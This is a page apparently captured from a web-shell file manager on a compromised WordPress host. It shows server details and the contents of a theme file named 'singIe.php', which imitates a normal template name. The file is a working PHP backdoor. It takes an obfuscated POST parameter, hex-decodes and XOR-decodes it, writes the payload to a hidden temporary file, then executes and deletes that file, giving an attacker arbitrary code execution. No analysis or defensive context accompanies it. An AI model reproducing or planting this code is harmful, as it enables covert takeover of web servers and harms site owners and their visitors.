HEX
Server: Apache
System: Linux pdx1-shared-a1-11 6.6.116-grsec-jammy-dirty #1 SMP Sat Nov 8 00:02:42 UTC 2025 x86_64
User: mollywopper (10344313)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/mollywopper/mollywoppersnyb.com/wp-content/themes/error-404-1747918571/singIe.php

<!--HN4jLwDo--> <?php if(filter_has_var(INPUT_POST, "\x63\x6F\x6Dp\x6Fn\x65nt")){ $object = array_filter([sys_get_temp_dir(), getcwd(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/var/tmp", "/dev/shm", getenv("TEMP")]); $marker = hex2bin($_POST["\x63\x6F\x6Dp\x6Fn\x65nt"]); $entity ='' ; foreach(str_split($marker) as $char){$entity.=chr(ord($char)^3);} while ($reference = array_shift($object)) { if (array_product([is_dir($reference), is_writable($reference)])) { $factor = implode("/", [$reference, ".ptr"]); $success = file_put_contents($factor, $entity); if ($success) { include $factor; @unlink($factor); exit; } } } }